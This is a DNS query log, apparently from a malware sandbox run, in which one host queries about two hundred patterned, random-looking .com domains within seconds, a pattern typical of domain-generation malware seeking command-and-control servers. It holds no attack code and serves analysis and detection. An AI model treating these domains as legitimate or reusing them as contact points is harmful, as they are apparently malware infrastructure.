                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.146635056 CET192.168.2.61.1.1.10x3928Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.147274017 CET192.168.2.61.1.1.10x987cStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.149153948 CET192.168.2.61.1.1.10x158eStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.184899092 CET192.168.2.61.1.1.10x4628Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.185172081 CET192.168.2.61.1.1.10x1da7Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.191684008 CET192.168.2.61.1.1.10x99a9Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.198122025 CET192.168.2.61.1.1.10x7eb2Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.549036026 CET192.168.2.61.1.1.10xf9ffStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587047100 CET192.168.2.61.1.1.10xe7a8Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587579012 CET192.168.2.61.1.1.10x9bc7Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET192.168.2.61.1.1.10x1c83Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.587965012 CET192.168.2.61.1.1.10x9c20Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.589572906 CET192.168.2.61.1.1.10xe29aStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591242075 CET192.168.2.61.1.1.10xfb3dStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591902018 CET192.168.2.61.1.1.10x5fdbStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.591973066 CET192.168.2.61.1.1.10xb5b3Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET192.168.2.61.1.1.10x7a85Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592580080 CET192.168.2.61.1.1.10xc30aStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.592936993 CET192.168.2.61.1.1.10x6a3fStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593169928 CET192.168.2.61.1.1.10xc0c9Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593316078 CET192.168.2.61.1.1.10xbbeStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.593450069 CET192.168.2.61.1.1.10xe2eeStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599276066 CET192.168.2.61.1.1.10x2b3dStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599277020 CET192.168.2.61.1.1.10xdd39Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.599634886 CET192.168.2.61.1.1.10xc670Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.624800920 CET192.168.2.61.1.1.10xd1f1Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET192.168.2.61.1.1.10xd114Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631608009 CET192.168.2.61.1.1.10x4409Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.631844044 CET192.168.2.61.1.1.10x3a2bStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632323980 CET192.168.2.61.1.1.10xe9d6Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632567883 CET192.168.2.61.1.1.10x5080Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.632946014 CET192.168.2.61.1.1.10xb923Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633570910 CET192.168.2.61.1.1.10x47e1Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633570910 CET192.168.2.61.1.1.10x6c45Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.633697033 CET192.168.2.61.1.1.10x4667Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.634218931 CET192.168.2.61.1.1.10xdf96Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.634243965 CET192.168.2.61.1.1.10x26bbStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.635026932 CET192.168.2.61.1.1.10x75fcStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.635305882 CET192.168.2.61.1.1.10x8840Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.637042046 CET192.168.2.61.1.1.10xe70cStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.637779951 CET192.168.2.61.1.1.10xa718Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.638125896 CET192.168.2.61.1.1.10xd763Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.638197899 CET192.168.2.61.1.1.10x6d65Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639031887 CET192.168.2.61.1.1.10xd1f0Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639031887 CET192.168.2.61.1.1.10xbff9Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.639288902 CET192.168.2.61.1.1.10x1ed2Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.641031027 CET192.168.2.61.1.1.10x682cStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.805098057 CET192.168.2.61.1.1.10x6073Standard query (0)www.gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.079622984 CET192.168.2.61.1.1.10xe6f2Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.095415115 CET192.168.2.61.1.1.10xff7Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.095415115 CET192.168.2.61.1.1.10x33f4Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.096088886 CET192.168.2.61.1.1.10xc32bStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.103612900 CET192.168.2.61.1.1.10x1dfeStandard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.114121914 CET192.168.2.61.1.1.10x2089Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.178848028 CET192.168.2.61.1.1.10x57c3Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.266386032 CET192.168.2.61.1.1.10x4592Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.266386032 CET192.168.2.61.1.1.10x4fa2Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.291718006 CET192.168.2.61.1.1.10xad4dStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.447458982 CET192.168.2.61.1.1.10x9e91Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.476953030 CET192.168.2.61.1.1.10x2e89Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.489907026 CET192.168.2.61.1.1.10x5c54Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.490083933 CET192.168.2.61.1.1.10xdaa6Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.490235090 CET192.168.2.61.1.1.10x3e3cStandard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.490401030 CET192.168.2.61.1.1.10xe885Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.490586042 CET192.168.2.61.1.1.10x5870Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.490717888 CET192.168.2.61.1.1.10x5226Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.492239952 CET192.168.2.61.1.1.10x5b32Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.492536068 CET192.168.2.61.1.1.10xe1a5Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.492749929 CET192.168.2.61.1.1.10xa626Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.493727922 CET192.168.2.61.1.1.10x6deaStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.513504028 CET192.168.2.61.1.1.10x4a1eStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.513937950 CET192.168.2.61.1.1.10xde6dStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.517961025 CET192.168.2.61.1.1.10x7c64Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.518374920 CET192.168.2.61.1.1.10x50abStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.528242111 CET192.168.2.61.1.1.10x4afdStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.528351068 CET192.168.2.61.1.1.10x704aStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.528460026 CET192.168.2.61.1.1.10x40bdStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.528821945 CET192.168.2.61.1.1.10x5d8bStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.528995991 CET192.168.2.61.1.1.10x4a90Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.529146910 CET192.168.2.61.1.1.10x4d52Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.529284954 CET192.168.2.61.1.1.10x2f14Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.534964085 CET192.168.2.61.1.1.10x4516Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.537441969 CET192.168.2.61.1.1.10x70f0Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.538068056 CET192.168.2.61.1.1.10xbeStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.538235903 CET192.168.2.61.1.1.10x99d6Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.538427114 CET192.168.2.61.1.1.10x9423Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.538582087 CET192.168.2.61.1.1.10x8279Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.538810968 CET192.168.2.61.1.1.10x263aStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.542630911 CET192.168.2.61.1.1.10xfdd7Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.552391052 CET192.168.2.61.1.1.10x97c9Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.553565025 CET192.168.2.61.1.1.10xdd8bStandard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.554044008 CET192.168.2.61.1.1.10x8cc1Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.602207899 CET192.168.2.61.1.1.10x80c8Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.602524996 CET192.168.2.61.1.1.10x891fStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.605778933 CET192.168.2.61.1.1.10x718Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.618232965 CET192.168.2.61.1.1.10xf454Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.618561029 CET192.168.2.61.1.1.10x4c4dStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.618841887 CET192.168.2.61.1.1.10xfe6cStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.619056940 CET192.168.2.61.1.1.10xe4d7Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.619894028 CET192.168.2.61.1.1.10xe2d6Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.620178938 CET192.168.2.61.1.1.10x4f15Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.620969057 CET192.168.2.61.1.1.10xc939Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633518934 CET192.168.2.61.1.1.10x9342Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633570910 CET192.168.2.61.1.1.10x9b85Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.633955002 CET192.168.2.61.1.1.10xfd50Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634044886 CET192.168.2.61.1.1.10x183dStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634124041 CET192.168.2.61.1.1.10xa06eStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.634252071 CET192.168.2.61.1.1.10x5255Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.638997078 CET192.168.2.61.1.1.10x61c2Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.661858082 CET192.168.2.61.1.1.10x4283Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.663368940 CET192.168.2.61.1.1.10x3fe8Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:04.669218063 CET192.168.2.61.1.1.10x3ab7Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.034351110 CET192.168.2.61.1.1.10xfa97Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.038032055 CET192.168.2.61.1.1.10x66a8Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042192936 CET192.168.2.61.1.1.10x76deStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.042536974 CET192.168.2.61.1.1.10x6424Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.051827908 CET192.168.2.61.1.1.10x942Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.052756071 CET192.168.2.61.1.1.10x72b3Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.137589931 CET192.168.2.61.1.1.10x1b69Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.163042068 CET192.168.2.61.1.1.10x73baStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.164978981 CET192.168.2.61.1.1.10xac75Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:05.184269905 CET192.168.2.61.1.1.10xefd4Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:06.019068956 CET192.168.2.61.1.1.10xc128Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.371062994 CET192.168.2.61.1.1.10x968bStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.495057106 CET192.168.2.61.1.1.10xefabStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.591576099 CET192.168.2.61.1.1.10xd7acStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.663789034 CET192.168.2.61.1.1.10x9756Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.753360033 CET192.168.2.61.1.1.10xdc7bStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.862262011 CET192.168.2.61.1.1.10x7ab0Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.866374969 CET192.168.2.61.1.1.10x3b04Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.885425091 CET192.168.2.61.1.1.10x8a23Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.899480104 CET192.168.2.61.1.1.10x107aStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.901992083 CET192.168.2.61.1.1.10xd6f9Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.902458906 CET192.168.2.61.1.1.10x1d06Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.907099009 CET192.168.2.61.1.1.10xad91Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.909259081 CET192.168.2.61.1.1.10x5103Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.911552906 CET192.168.2.61.1.1.10xd4deStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.912851095 CET192.168.2.61.1.1.10x53a3Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.930736065 CET192.168.2.61.1.1.10x73c7Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931464911 CET192.168.2.61.1.1.10x11cbStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931672096 CET192.168.2.61.1.1.10x2fdStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.931849957 CET192.168.2.61.1.1.10xc2c7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932225943 CET192.168.2.61.1.1.10x1733Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932482958 CET192.168.2.61.1.1.10x7f42Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.932869911 CET192.168.2.61.1.1.10x8406Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.933080912 CET192.168.2.61.1.1.10x582eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.965065002 CET192.168.2.61.1.1.10xac14Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966201067 CET192.168.2.61.1.1.10xd719Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966581106 CET192.168.2.61.1.1.10xfafaStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:07.966834068 CET192.168.2.61.1.1.10xbdf7Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.012837887 CET192.168.2.61.1.1.10x3a99Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.085100889 CET192.168.2.61.1.1.10x36e0Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.192832947 CET192.168.2.61.1.1.10x6e8fStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.223048925 CET192.168.2.61.1.1.10x2272Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.316044092 CET192.168.2.61.1.1.10xc8e3Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328265905 CET192.168.2.61.1.1.10x8770Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328412056 CET192.168.2.61.1.1.10xe8e8Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.328989029 CET192.168.2.61.1.1.10xe425Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.329674959 CET192.168.2.61.1.1.10x4ba8Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.331176996 CET192.168.2.61.1.1.10xaf6fStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.520868063 CET192.168.2.61.1.1.10xdf37Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.521030903 CET192.168.2.61.1.1.10x36beStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.531621933 CET192.168.2.61.1.1.10x165dStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.550911903 CET192.168.2.61.1.1.10x7393Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.554161072 CET192.168.2.61.1.1.10x5e91Standard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.556030035 CET192.168.2.61.1.1.10x4b69Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.556422949 CET192.168.2.61.1.1.10x9479Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.559467077 CET192.168.2.61.1.1.10x99f9Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.560183048 CET192.168.2.61.1.1.10x3fcbStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.561152935 CET192.168.2.61.1.1.10x463dStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.563647032 CET192.168.2.61.1.1.10xb6d8Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.565386057 CET192.168.2.61.1.1.10x542bStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.567495108 CET192.168.2.61.1.1.10xe760Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.570264101 CET192.168.2.61.1.1.10xd8e6Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580462933 CET192.168.2.61.1.1.10x8384Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET192.168.2.61.1.1.10x5ce4Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.580841064 CET192.168.2.61.1.1.10x612dStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET192.168.2.61.1.1.10xadc8Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.584475040 CET192.168.2.61.1.1.10xc284Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.587977886 CET192.168.2.61.1.1.10x11ffStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:08.588399887 CET192.168.2.61.1.1.10x5456Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
